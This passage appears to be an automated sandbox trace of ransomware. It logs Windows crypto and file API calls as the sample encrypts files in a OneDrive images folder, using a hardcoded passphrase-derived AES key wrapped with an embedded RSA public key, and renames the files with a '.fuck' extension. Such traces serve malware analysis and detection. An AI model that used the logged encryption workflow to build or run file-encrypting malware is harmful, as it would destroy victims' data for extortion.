lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.264] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.264] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.273] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x347, lpOverlapped=0x0) returned 1 [0277.273] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x347, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x350) returned 1 [0277.273] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x350, lpOverlapped=0x0) returned 1 [0277.273] CloseHandle (hObject=0x5d3c) returned 1 [0277.273] CloseHandle (hObject=0x5d48) returned 1 [0277.273] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\cloud.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\cloud.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\cloud.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\cloud.svg"), bFailIfExists=0) returned 1 [0277.276] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\cloud.svg", dwFileAttributes=0x0) returned 1 [0277.277] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\cloud.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\cloud.svg.gsg")) returned 1 [0277.278] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\cloud.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\cloud.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\cloud.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\cloud.svg.fuck")) returned 1 [0277.279] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.279] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.279] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.279] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.280] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.280] GetLastError () returned 0x0 [0277.280] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\done_graphic.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\done_graphic.svg")) returned 0x20 [0277.280] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\done_graphic.svg", dwFileAttributes=0x80) returned 1 [0277.280] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\done_graphic.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\done_graphic.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.281] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\done_graphic.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\done_graphic.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.282] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\done_graphic.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.283] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.285] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.285] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.285] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.285] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.285] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.285] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.285] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2cd80) returned 1 [0277.286] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2cd80, dwCertEncodingType=0x1, pInfo=0x2f34e70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34ea0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34ea8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc0c8) returned 1 [0277.286] CryptEncrypt (in: hKey=0x2fc0c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.286] CryptEncrypt (in: hKey=0x2fc0c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2ce08*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2ce08*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.286] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2ce08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2ce08*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.287] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.338] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.338] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.340] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.340] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.340] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.340] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.340] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.340] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.340] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.341] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.341] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.341] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.409] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.409] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.410] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.410] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.410] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.410] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.410] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.410] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.410] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.410] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.410] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.410] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.411] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.411] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.411] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.411] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.411] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.411] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.411] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.411] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.412] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.415] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.415] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.415] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.415] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.415] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.415] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.415] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.416] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.416] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.416] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.416] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.416] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.416] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.416] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.416] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.417] ReadFile (in: hFile=0x5d48, 